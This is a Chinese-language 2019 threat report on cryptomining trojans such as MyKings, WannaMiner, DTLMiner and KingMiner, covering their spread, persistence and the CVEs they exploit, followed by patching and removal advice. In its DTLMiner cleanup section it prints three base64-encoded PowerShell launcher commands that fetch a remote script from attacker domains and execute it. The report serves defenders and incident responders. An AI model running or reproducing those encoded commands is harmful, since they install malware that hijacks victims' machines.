一、背景

2019年8月，国家发布支持深圳建设中国特色社会主义先行示范区的意见，其中提到，支持在深圳开展数字货币研究与移动支付等创新应用。业内人士认为，开展数字货币研究将发挥数字经济的积极作用。

2009年比特币诞生，至今已经第十年，创建于2014年的门罗币也已经到了第5年。以比特币，门罗币为代表的数字加密货币近年来已逐渐为大众所熟知，不少人利用交易数字货币赚取收益。

随着数字经济的蓬勃发展，由此带来的数字资产安全问题也不断出现，根据数字货币的基本原理：不依靠特定货币机构发行、依据特定算法、通过大量的计算产生，使得“挖矿”成为最基本的获取数字加密货币的方式。而想要通过“挖矿”获取更多的币，唯一的途径是提升算力，所以需要投入大量的资金用购买计算设备。

而黑客总是希望不投入资金就获得大量回报，“控制其他人的计算机进行挖矿计算”的想法油然而生，这也就是“挖矿木马”的概念。“挖矿木马”的最早出现时间目前不能确定，但是开始大规模流行于2017年初。

黑客入侵控制大量计算机并植入矿机程序后，利用计算机的CPU或GPU资源完成大量运算，从而获得数字加密货币。同时，黑产在暗网进行非法数据或数字武器售卖时大部分采用比特币作为交易货币，导致数字加密货币成为黑灰产业的流通媒介，也催生了挖矿产业的持续繁荣。从2017年爆发之后，挖矿木马逐渐成为网络世界主要的威胁之一。

挖矿进程CPU占用

本文首先介绍以比特币价格变化曲线为时间轴，在该期间发生的重大安全事件，然后总结2019年挖矿木马的总体趋势以及技术特点，并给出了通用型和具有针对性的防御和处置建议，最后对挖矿木马的未来趋势作出预测。

二、币价曲线与重大安全事件

比特币价格与安全事件

观察2017～2019年的比特币价格曲线和重大安全事件图，可以发现在此期间，“币价高位剧烈波动，安全事件层出不穷”，部分影响较大的攻击事件如下：

2.1 WannaCry

2017年5月12日，WannaCry蠕虫通过MS17-010漏洞在全球范围大爆发，感染了大量企业的计算机。该蠕虫感染计算机后向计算机中植入敲诈者病毒，导致电脑大量文件被加密，然后向受害者索要比特币作为恢复文件的赎金。

2.2 第一次上涨

WannaCry蠕虫爆发后的半年时间内（即2017年5月至2017年12月），比特币价格呈爆发性增长，由1000美元/BTC上涨至17000美元/BTC。

WannaCry之后的一段时间内，没有出现其他勒索病毒使用“永恒之蓝”漏洞大规模传播的情况，然而挖矿木马却看从中到了“商机”。2017年下半年开始陆续有利用“永恒之蓝”攻击的挖矿木马，首先被发现的是大型僵尸网络MyKings。

2.2.1 MyKings

Mykings僵尸网络是迄今为止发现的最复杂的僵尸网络之一，主要攻击特点为利用“永恒之蓝”漏洞和针对MsSQL，RDP，Telnet等服务进行密码爆破，然后在失陷主机植入挖矿模块，远程控制模块，并且利用扫描攻击模块进行蠕虫式传播。

2017年4月之后，MyKings传播量开始出现爆发式增长，正是其利用“永恒之蓝”漏洞武器攻击所导致。通过在僵尸网络中安装门罗币挖矿机，利用服务器资源挖矿，MyKings的门罗币钱包已获得超过百万人民币的收益。

2.2.2 ZombieBoy

2017年12月腾讯御见威胁情报中心检测到一款挖矿木马，其PDB文件中发现了明文字符串“C:\Users\ZombieBoy\Documents\Visual Studio 2017\Projects\nc\Release\nc.pdb”，在网上通过关键字“ZombieBoy”进行查找，我们发现了一款“永恒之蓝”漏洞利用工具，推测黑客将此工具改造后于传播挖矿木马。我们根据特征将其其命名为ZombieBoyMiner，御见后台统计数据显示，该木马在高峰时期感染超过7万台电脑。

漏洞利用工具ZombieBoy

2.3   波动下跌

ZombieBoyMiner出现时（2017年12月）正值比特币价格的最高峰，之后开始波动下跌过程。接着，2018年3月，另一个利用“永恒之蓝”漏洞大范围攻击的挖矿蠕虫病毒WannaMiner被发现了。

2.3.1    WannaMiner

WannaMiner木马将染毒机器构建成一个健壮的僵尸网络，并且支持内网自更新，最终目标为通过挖矿获利。由于其在内网传播过程中通过SMB进行内核攻击，可能造成企业内网大量机器出现蓝屏现象。根据统计数据，WannaMiner矿蠕虫感染量超过3万台。

WannaMiner的攻击流程如下：

WannaMiner的攻击流程

2.3.2    BuleHero

2018年8月出现了“最强漏洞攻击“的挖矿蠕虫病毒BuleHero。根据御见威胁情报中心持续跟踪结果，除了“永恒之蓝”漏洞外，BuleHero使用了以下漏洞进行攻击：

LNK漏洞CVE-2017-8464

Tomcat任意文件上传漏洞CVE-2017-12615

Apache Struts2远程代码执行漏洞CVE-2017-5638

Weblogic反序列化任意代码执行漏洞CVE-2018-2628，CVE-2019-2725

Drupal远程代码执行漏洞CVE-2018-7600

Apache Solr 远程代码执行漏洞CVE-2019-0193

THinkphpV5漏洞CNDV-2018-24942

除了以上漏洞之外，BuleHero的最新版本还使用了2019年9月20日浙江杭州警方公布的“PHPStudy“后门事件中披露的位于php_xmlrpc.dll模块中的漏洞。

“PHPStudy“后门利用

2.3.3    DTLMiner

2018年12月爆发了DTLMiner（永恒之蓝下载器）挖矿木马。黑客通过入侵某公司服务器，修改某款软件的的升级配置文件，导致安装该软件的用户在升级时下载了木马文件。木马运行后又利用“永恒之蓝”漏洞在内网中快速传播，导致仅2个小时受攻击用户就高达10万。

DTLMiner构建僵尸网络后，在中招机器植入门罗币矿机程序挖矿。由于DTLMiner前期在短时时间内感染量大量机器，后续又持续更新，加入了MsSQL爆破、IPC$爆破、RDP爆破和Lnk漏洞利用等攻击手法，使得其在2019年一直保持活跃。

升级组件漏洞被利用攻击声明

2.3.4    “匿影”

DTLMiner之后，2019年3月初出现了“匿影”挖矿木马。该木马大肆利用功能网盘和图床隐藏自己，并携带NSA武器库从而具备在局域网横向传播的能力。“匿影”所使用大量的公共服务如下：

“匿影”使用的公共服务

2.4 第二次上涨

在“匿影”挖矿木马出现的同时，比特币价格重新恢复上涨。2019年3月至2019年6月，比特币价格由4000美元/BTC上涨至12000美元/BTC。

sodinokibi

2019年6月，在比特币价格再次回升到高点时，sodinokibi勒索病毒爆发。该勒索病毒首先出现于2019年4月底，早期使用web服务相关漏洞传播，与大名鼎鼎的GandCrab勒索病毒较为相似。此时GandCrab已宣布停止运营，sodinokibi几乎完全继承了GandCrab的传播渠道。

6月左右，sodinokibi勒索病毒开始伪装成税务单位、司法机构，使用钓鱼欺诈邮件来传播，由于系统默认设置不显示文件扩展名，伪装成doc文档的EXE病毒常被错误判断为文档而双击打开。

伪装成文档的Sodinokib勒索病毒

2019年6月之后，比特币价格开始缓慢下跌。在2019年下半年，也没有出现影响较大的，新的挖矿木马家族。

三、2019挖矿木马感染趋势

3.1 样本产量

根据腾讯安全御见威胁情报中心统计数据，2019年挖矿木马攻击呈“上升-下降-保持平稳”的趋势。数据显示，2019年上半年挖矿木马非常活跃，高峰时检出攻击样本超过10万个/日；5月之后攻击趋势有所减缓，下降到了6万个/日，之后保持平稳。总体来看，挖矿木马在主机和服务器上都保有较大规模的感染量，使得挖矿木马成为企业面临的最严重的安全威胁之一。

2019年挖矿木马日产量趋势

3.2 地区分布

从地区分布来看，2019年挖矿木马在全国各地均有分布，其中感染最严重的地区分别为广东省，浙江省，北京市，以及江苏省。

2019年感染挖矿木马区域分布

3.3 行业分布

从行业分布来看，2019年受挖矿木马影响最严重的行业分别为互联网，制造业，科研和技术服务以及房地产业。

2019年挖矿木马影响行业分布

3.4 活跃家族

2019年挖矿木马最活跃的三个家族分别为WannaMiner，MyKings，DTLMiner（永恒之蓝下载器木马）。其中MyKings是老牌的僵尸网络家族，而WannaMiner和DTLMiner分别在2018年初和年底出现。在2019年这几个家族都有超过2万用户的感染量，他们的共同特点为利用“永恒之蓝”漏洞进行蠕虫式传播，使用多种类的持久化攻击技术，难以被彻底清除。

2019年挖矿木马活跃TOP榜

3.5 主要入侵方式

2019年挖矿木马主要入侵方式前三名分别是漏洞攻击、弱口令爆破和借助僵尸网络。由于挖矿木马需要获取更多的计算资源，所以利用普遍存在的漏洞和弱口令，或者是控制大量机器的僵尸网络进行大规模传播成为挖矿木马的首选。

挖矿木马主要入侵方式

3.5.1   漏洞攻击类型

挖矿木马攻击时利用的漏洞最主要类型为Windows系统漏洞（“永恒之蓝”），其次是WebLogic相关组件漏洞，Apache相关组件漏洞。常用于攻击的包括以下CVE编号的漏洞：

MS17-010“永恒之蓝”CVE-2017-0143

Weblogic反序列化任意代码执行漏洞CVE-2017-10271，CVE-2018-2628，CVE-2019-2725

Apache Struts2远程代码执行漏洞CVE-2017-5638

Apache Solr 远程代码执行漏洞CVE-2019-0193

Apache Tomcat远程代码执行漏洞CVE-2017-12615

挖矿木马主要漏洞攻击类型

3.5.2   爆破攻击类型

挖矿木马主要的爆破攻击类型为SQL爆破(包括MsSQL、MySQL)，其次是IPC$和SSH。由于部分IT管理人员缺乏安全意识，许多数据库和远程登录服务被设置为弱口令。SplashData公布的2019排名前五位的最差密码分别是“123456”、“123456789”、“qwerty”、“password”和“1234567”，这些密码也是黑客在爆破攻击时的首选。挖矿木马通过内置的包含大量简单密码的字典进行自动匹配，很容易破解此类弱口令并入侵系统。

挖矿木马主要爆破攻击类型

四、2019挖矿木马技术特点

4.1 传播特点

4.1.1    供应链感染

2018年底出现的DTLMiner是利用现有软件的升级功能进行木马分发，属于供应链感染的典型案例。黑客在后台配置文件中插入木马下载链接，导致软件在升级时下载木马文件。由于软件本身拥有巨大的用户量，导致木马在短时间内感染量大量的机器。

 DTLMiner篡改的配置文件

4.1.2    跨平台攻击

挖矿木马经历了从控制普通电脑到以控制企业主机为主，从只控制Windows挖矿到混合感染多个平台的变化。2019年腾讯御见威胁情报中心发现了”Agwl“，“萝莉帮”，WannaMine，Satan等多个针对linux的挖矿木马。

2019年3月，Satan病毒出现最新变种，该变种病毒针对Windows系统和Linux系统进行无差别攻击，然后在中招电脑中植入勒索病毒勒索比特币、同时植入挖矿木马挖矿门罗币。

Satan病毒跨平台攻击

我们发现黑产为了实现的利益最大化，还会将挖矿木马与勒索软件、远控后门、剪贴板大盗、DDOS等木马的打包进行混合攻击。以下列举2019年的7个流行家族及其在攻击中植入的病毒种类：

多种病毒组合攻击

4.1.3    社交网络

2019年12月御见威胁情报中心发现了通过社会工程骗术传播的“老虎”挖矿木马（LaofuMiner）。攻击者将远控木马程序伪装成“火爆新闻”、“色情内容”、“隐私资料”、“诈骗技巧”等文件名，通过社交网络发送到目标电脑，受害者双击查看文件立刻被安装“大灰狼”远控木马。然后攻击者通过远控木马控制中毒电脑下载挖矿木马，中毒电脑随即沦为矿工。

用于钓鱼攻击的部分文件名如下：

LaofuMiner使用的钓鱼文件

4.1.4    VNC爆破

2019年3月，Phorpiex僵尸网络针对被广泛使用的远程管理工具“VNC”默认端口5900进行爆破攻击，在高价值服务器上下载运行GandCrab 5.2勒索病毒加密重要系统资料实施敲诈勒索；若攻破有数字货币交易的电脑，则运行数字货币钱包劫持木马抢钱；若被攻击的只是普通电脑则被植入门罗币挖矿木马，成为Phorpiex控制的矿工电脑。

Phorpiex针对VNC服务爆破

4.1.5    感染型病毒

2019年4月感染型病毒Sality被发现利用建立的P2P网络，传播以盗取、劫持虚拟币交易为目的的“剪切板大盗“木马。

Sality可感染本地硬盘、可移动存储设备、远程共享目录下的可执行文件，同时会利用可移动、远程共享驱动器的自动播放功能进行感染，然后在中招系统下载并执行“剪切板大盗”木马。

Sality修改可执行文件的入口点，以病毒代码替换原始文件代码，使得所有被感染程序启动时执行病毒功能：

Sality感染可执行文件

“剪切板大盗“木马通过剪切板内容中的字符格式特点判断以太币或比特币钱包地址，并将切板内容替换为指定钱包，若用户在此时粘贴并进行转账操作，数字资产便落入黑客的口袋：

“剪切板大盗“木马替换钱包地址

4.2 恶意代码执行

4.2.1    Powershell

2019年4月3日DTLMiner在Powershell中反射加载PE映像，达到 “无文件”形式执行挖矿程序。这种方法直接在Powershell.exe进程中运行恶意代码，注入“白进程”执行的方式可能造成难以检测和清除挖矿代码。这也是首次发现的，大规模利用“无文件”形式执行的挖矿木马。

DTLMiner在感染系统上安装计划任务，反复下载和执行一段加密的Powershell脚本，在脚本代码中嵌入了一段Base64编码的字符$Code64，该段字符实际上是XMRIG挖矿程序的二进制数据。

 Base64编码的XMRig二进制数据

Powershell首先将$Code64解码为Bytes格式，然后调用Invoke-ReflectivePEInjection函数在内存中反射PE注入执行挖矿程序。

DTLMiner反射注入执行挖矿程序

4.2.2    DLL侧加载

KingMiner最早于2018年6月中旬出现，是一种针对Windows服务器MSSQL进行爆破攻击的门罗币挖矿木马。攻击者采用多种逃避技术来绕过虚拟机环境和安全检测，导致一些反病毒引擎无法准确查杀。

未来逃避杀软检测，KingMiner启动挖矿木马时采用DLL侧加载(DLL Side-Loading)技术，也就是“白+黑”技术，利用正常的有数字签名的白文件来调用恶意DLL。其使用到的有微软系统文件“Credential Backup andRestore Wizard(凭据备份和还原向导)”和多个知名公司的数字签名的文件：

“GuangZhou KuGou Computer Technology Co.,Ltd.”

“Google Inc”

“福建创意嘉和软件有限公司”

 KingMiner利用的白文件签名

4.3 持久化攻击

4.3.1    计划任务

KingMiner使用RegisterTaskDefinition创建名为WindowsMonitor的计划任务，每15分钟执行一次Powershell脚本；或者安装在系统启动时执行的计划任务WindowsHelper，并在WindowsHelper中安装计划任务WindowsMonitor执行一次VBS脚本代码。

KingMiner安装计划任务

4.3.2    WMI计时器

KingMiner在WMI中创建为名为WindowsSystemUpdate_WMITimer的计时器，并将执行一段脚本代码的事件消费者WindowsSystemUpdate_consumer通过事件过滤器WindowsSystemUpdate _filter绑定到计时器。随着计时器触发，每15分钟执行一次VBS脚本代码。

KingMiner安装WMI计时器

4.3.3    阻断外部入侵

KingMiner判断计算机版本是否受CVE-2019-0708漏洞的影响，同时判断计算机是否安装指定的补丁kb4499175 kb4500331 KB4499149 KB4499180 KB4499164（这些补丁是微软发布的CVE-2019-0708远程桌面服务远程代码执行漏洞的补丁号）。

如果没有安装CVE-2019-0708补丁，则修改设置禁止其他机器通过远程桌面服务访问本机，以此来来阻止其他木马进入系统，从而达到独占挖矿资源的目的。

KingMiner关闭RDP服务

五、挖矿木马防御和处置建议

5.1 防御方案

5.1.1  密码管理

服务器使用安全的密码策略，特别是SQL服务器的sa账号密码，切勿以下弱口令；

123456、admin、root、123456789、qwert、password、1234567、12345678、12345、lloveyou、111111、123123、888888、1234567890、88888888、666666等

5.1.2  端口管理

服务器暂时关闭不必要的端口（如135、139、445、3389），方法可参考：https://guanjia.qq.com/web_clinic/s8/585.html；

企业用户可部署腾讯T-Sec高级威胁检测系统（腾讯御界），发现、追踪黑客攻击线索。T-Sec高级威胁检测系统是基于腾讯安全反病毒实验室的安全能力、依托腾讯在云和端的海量数据，研发出的独特威胁情报和恶意检测模型系统。（https://s.tencent.com/product/gjwxjc/index.html）

腾讯T-Sec高级威胁检测系统sqlserver爆破告警

5.1.3 Windows漏洞修复

根据微软公告及时修复以下Windows系统高危漏洞；

MS17-010永恒之蓝漏洞

XP、WindowsServer2003、win8等系统访问：

http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598

Win7、win8.1、Windows Server 2008、Windows10,WindowsServer2016等系统访问：

https://technet.microsoft.com/zh-cn/library/security/ms17-010.aspx

Office公式编辑器漏洞 CVE-2017-11882

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882

Lnk漏洞CVE-2017-8464

https://portal.msrc.microsoft.com/zh-cn/security-guidance/advisory/CVE-2017-8464 

IE漏洞 CVE-2018-8174

https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-8174

RDP服务漏洞 CVE-2019-0708

Windows XP、Windows 2003：

https://support.microsoft.com/zh-cn/help/4500705/customer-guidance-for-cve-2019-0708

Windows 7、Windows 2008R2：

https://www.catalog.update.microsoft.com/Search.aspx?q=KB4499175

Windows 2008：

https://www.catalog.update.microsoft.com/Search.aspx?q=KB4499180

也可使用腾讯T-Sec终端安全管理系统（腾讯御点）或腾讯电脑管家进行漏洞扫描和修复。

（https://s.tencent.com/product/yd/index.html）

腾讯御点修复系统漏洞

5.1.4    服务器组件漏洞修复

a. Oracle Weblogic任意代码执行漏洞

CVE-2017-10271

影响版本

OracleWebLogic Server10.3.6.0.0

OracleWebLogic Server12.1.3.0.0

OracleWebLogic Server12.2.1.1.0

OracleWebLogic Server12.2.1.2.0

官方补丁公告：

https://www.oracle.com/security-alerts/cpuoct2017.html

CVE-2018-2628

影响版本

Oracle WebLogic Server10.3.6.0

Oracle WebLogic Server12.2.1.2

Oracle WebLogic Server12.2.1.3

Oracle WebLogic Server12.1.3.0

官方补丁公告：

http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html

CVE-2019-2725

影响版本

Oracle WebLogic Server10.3.6.0

Oracle WebLogic Server12.1.3.0

官方补丁公告：

https://www.oracle.com/security-alerts/alert-cve-2019-2725.html

b. Apache相关组件漏洞

Apache Struts2远程代码执行漏洞CVE-2017-5638

影响范围

Struts 2.3.5 – Struts 2.3.31

Struts 2.5 – Struts 2.5.10

官方补丁公告：

https://cwiki.apache.org/confluence/display/WW/S2-045?from=timeline&isappinstalled=0

Apache Solr 远程代码执行漏洞CVE-2019-0193

受影响版本

Apache Solr < 8.2.0

官方补丁公告：

https://issues.apache.org/jira/browse/SOLR-13669

Apache Tomcat远程代码执行漏洞CVE-2017-12615

影响版本

Apache Tomcat 7.0.0-7.0.79

官方补丁公告：

http://tomcat.apache.org/security-7.html#Fixed_in_Apache_Tomcat_7.0.81

也可使用腾讯安全研发的T-Sec网络资产风险监测系统（腾讯御知）排查网络资产的安全风险，对企业的网络资产及各类应用的可用性、安全性与合规性等进行定期的安全扫描、持续性的风险预警和漏洞检测。（https://s.tencent.com/product/narms/index.html）

腾讯T-Sec网络资产风险监测系统检测Apache struts2漏洞

5.2 处置建议

如发现主机系统出现明显卡慢，或服务器出现进程长时间超过80%CPU占用的现象，则可能感染了挖矿木马。可按照以下步骤进行确认和移除操作。

5.2.1 感染确认

1)    个人用户

a.     通过Windows任务管理器（或PCHunter或Process Explorer）或Linux下使用命令ps -aux ，找到高CPU占用的进程及其文件。若文件在系统目录下，在另一台机器上找到同名的正常系统文件与可疑文件进行对比；若在某软件目录下，找到该软件的同名正常文件与可疑文件进行对比。

挖矿进程CPU占用

b.     使用PCHunter或Linux下使用命令netstat -tup 查找进程网络连接的IP及端口，特别是5559、7777、4444、13333等可疑远程端口连接。接着使用该IP地址进行域名反查，注意指向该IP的域名中是否包含“miner”,”pool”等字样。

若在以上a步骤中排除系统文件或正常软件文件，且该文件具有b中的可疑网络连接，则可能感染挖矿木马。

2)    企业用户

企业用户建议部署腾讯T-Sec高级威胁检测系统（腾讯御界），可识别挖矿过程中的通信协议，从网络流量中检测挖矿行为。

腾讯T-Sec高级威胁检测系统（御界）检测挖矿行为

5.2.2 病毒移除

确认感染挖矿木马后，可尝试按照以下步骤进行清除：

1）Windows系统

使用PCHunter或其他管理工具退出可疑进程，删除进程文件，并在启动项、服务、计划任务中找到启动该文件映像的项目并删除。

PCHunter删除挖矿木马启动项

2）Linux系统

下通过命令pkill -9退出进程；

删除进程文件，并检查crontab命令下显示的木马相关定时任务；

删除以下目录下木马相关定时任务；

/var/spool/cron/root/

/var/spool/cron/crontabs

删除以下目录下木马相关自启动项；

/etc/rcS.d/

/etc/rc.d/init.d/

企业用户可在服务器部署腾讯T-Sec终端安全管理系统（腾讯御点），对挖矿木马进行清理。

5.2.3 清理僵尸网络

1）MyKings

MyKings僵尸网络清理建议

排查数据库作业名称，清除包含恶意代码的作业；

排查数据库存储过程，清理包含恶意代码的内容；

由于MyKings最新版本还会感染“暗云“MBR、Rookit等顽固病毒，用户可使用电脑管家系统急救箱进行查杀清理，使用指南及下载链接：https://guanjia.qq.com/avast/283/index.html

腾讯电脑管家系统急救箱清理MBR和内核级病毒

2）WannaMiner

WannaMiner清理建议

3）DTLMiner（永恒之蓝下载器木马）

DTLMiner清理建议

删除随机名计划任务：“VDoaC” 、"hadpeRz\oABwX"、"lKNVFjCJm\oWuUXql"

DTLMiner随机名计划任务

启动程序分别为：

/c "set A=power& call %A%shell -ep bypass -e JABMAGUAbQBvAG4AXwBEAHUAYwBrAD0AJwBWAEQAbwBhAEMAJwA7ACQAeQA9ACcAaAB0AHQAcAA6AC8ALwB0AC4AdAByADIAcQAuAGMAbwBtAC4AYwBvAG0ALwB2AC4AagBzACcAOwAkAHoAPQAkAHkAKwAnAHAAJwArACcAPwBtAHMAXwAyADAAMQA5ADEAMgAyADcAJwA7ACQAbQA9ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAHkAKQA7AFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AF0AOgA6AEMAcgBlAGEAdABlACgAKQAuAEMAbwBtAHAAdQB0AGUASABhAHMAaAAoACQAbQApAHwAZgBvAHIAZQBhAGMAaAB7ACQAcwArAD0AJABfAC4AVABvAFMAdAByAGkAbgBnACgAJwB4ADIAJwApAH0AOwBpAGYAKAAkAHMALQBlAHEAJwBkADgAMQAwADkAYwBlAGMAMABhADUAMQA3ADEAOQBiAGUANgBmADQAMQAxAGYANgA3AGIAMwBiADcAZQBjADEAJwApAHsASQBFAFgAKAAtAGoAbwBpAG4AWwBjAGgAYQByAFsAXQBdACQAbQApAH0A"


/c "set A=power& call %A%shell -ep bypass -e JABMAGUAbQBvAG4AXwBEAHUAYwBrAD0AJwBoAGEAZABwAGUAUgB6AFwAbwBBAEIAdwBYACcAOwAkAHkAPQAnAGgAdAB0AHAAOgAvAC8AdAAuAGEAdwBjAG4AYQAuAGMAbwBtAC8AdgAuAGoAcwAnADsAJAB6AD0AJAB5ACsAJwBwACcAKwAnAD8AbQBzAF8AMgAwADEAOQAxADIAMgA3ACcAOwAkAG0APQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJAB5ACkAOwBbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBNAEQANQBdADoAOgBDAHIAZQBhAHQAZQAoACkALgBDAG8AbQBwAHUAdABlAEgAYQBzAGgAKAAkAG0AKQB8AGYAbwByAGUAYQBjAGgAewAkAHMAKwA9ACQAXwAuAFQAbwBTAHQAcgBpAG4AZwAoACcAeAAyACcAKQB9ADsAaQBmACgAJABzAC0AZQBxACcAZAA4ADEAMAA5AGMAZQBjADAAYQA1ADEANwAxADkAYgBlADYAZgA0ADEAMQBmADYANwBiADMAYgA3AGUAYwAxACcAKQB7AEkARQBYACgALQBqAG8AaQBuAFsAYwBoAGEAcgBbAF0AXQAkAG0AKQB9AA=="

/c "set A=power& call %A%shell -ep bypass -e JABMAGUAbQBvAG4AXwBEAHUAYwBrAD0AJwBsAEsATgBWAEYAagBDAEoAbQBcAG8AVwB1AFUAWABxAGwAJwA7ACQAeQA9ACcAaAB0AHQAcAA6AC8ALwB0AC4AYQBtAHgAbgB5AC4AYwBvAG0ALwB2AC4AagBzACcAOwAkAHoAPQAkAHkAKwAnAHAAJwArACcAPwBtAHMAXwAyADAAMQA5ADEAMgAyADcAJwA7ACQAbQA9ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAHkAKQA7AFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AF0AOgA6AEMAcgBlAGEAdABlACgAKQAuAEMAbwBtAHAAdQB0AGUASABhAHMAaAAoACQAbQApAHwAZgBvAHIAZQBhAGMAaAB7ACQAcwArAD0AJABfAC4AVABvAFMAdAByAGkAbgBnACgAJwB4ADIAJwApAH0AOwBpAGYAKAAkAHMALQBlAHEAJwBkADgAMQAwADkAYwBlAGMAMABhADUAMQA3ADEAOQBiAGUANgBmADQAMQAxAGYANgA3AGIAMwBiADcAZQBjADEAJwApAHsASQBFAFgAKAAtAGoAbwBpAG4AWwBjAGgAYQByAFsAXQBdACQAbQApAH0A"

六、挖矿木马未来的趋势

6.1  “永恒之蓝“漏洞

自2017年NSA武器泄漏以来，“永恒之蓝“漏洞被挖矿木马广泛利用。随着各大安全厂商对该漏洞进行修复和防御，该漏洞的影响正在逐渐减少。但是从数据上看，仍有约30%未安装“永恒之蓝“漏洞补丁，因此预计2020年有可能出现新的利用“永恒之蓝“漏洞的挖矿木马。

6.2 BlueKeep漏洞

2019年5月15日，微软发布了针对远程桌面服务（Remote Desktop Services ，以前称为终端服务）的关键远程执行代码漏洞CVE-2019-0708的修复程序，该漏洞影响Windows的Windows 7、Windows Server 2008 R2、Windows Server 2008、Windows 2003、Windows XP等多个版本。攻击者一旦成功触发该漏洞，便可以在目标系统上执行任意代码。

2019年9月，我们注意到利用CVE-2019-0708漏洞的EXP代码已被公开发布至metasploit-framework的Pull requests中，经测试可以实现远程代码执行；同时在2019年10月挖矿蠕虫DTLMiner在其攻击模块中也已经加入了CVE-2019-0708漏洞检测代码，因此我们推测在2020年极有可能出现利用该漏洞的新型挖矿木马。

6.3 僵尸网络

MyKings、KingMiner、WannaMiner等挖矿僵尸网络在前期感染了大量机器，控制系统后通过计划任务、数据库存储过程、WMI等技术进行持久化攻击，因而可随时从服务器下载最新版本的恶意代码，很难被彻底清除。未来安全厂商与这些病毒团伙在的对抗还会持续。

参考链接：

WannaCry蠕虫详细分析

https://www.freebuf.com/articles/system/134578.html

WannaMiner挖矿木马攻击事件通报

https://mp.weixin.qq.com/s/FEyaQ_AHn2TZPy-5FeMP7A

ZombieBoy木马分析

https://www.freebuf.com/column/157584.html

“VNC劫匪”攻击预警：中招企业遭遇GandCrab 5.2等多种病毒连环暴击

https://www.freebuf.com/column/198957.html

区块链火了Sality病毒，感染3万电脑伺机盗取比特币

https://www.freebuf.com/column/218404.html

针对SQL弱口令的爆破攻击再度袭来，KingMiner矿工已控制上万电脑

https://www.freebuf.com/column/221248.html

永恒之蓝木马下载器开创“无文件挖矿”新模式

https://www.freebuf.com/column/200241.html

GandCrab退出江湖 警惕继任者sodinokibi勒索病毒取而代之

https://www.freebuf.com/column/205215.html

BlueHero蠕虫再升级，新增震网3代武器库，看一眼就中招

https://www.freebuf.com/column/181604.html

蠕虫病毒bulehero再次利用“永恒之蓝”在企业内网攻击传播

https://www.freebuf.com/column/180544.html

BuleHero 4.0挖矿蠕虫真疯狂，超十种方法攻击企业网络

https://www.freebuf.com/column/219973.html

支持在深圳开展数字货币研究

https://finance.sina.com.cn/blockchain/coin/2019-08-19/doc-ihytcitn0105787.shtml

悄然崛起的挖矿机僵尸网络：打服务器挖价值百万门罗币

https://www.freebuf.com/articles/web/146393.html

“驱动人生”木马详细分析报告 2小时感染10万台电脑挖门罗币

https://www.freebuf.com/column/192015.html

一场精心策划的针对驱动人生公司的定向攻击活动分析

https://www.freebuf.com/articles/system/192194.html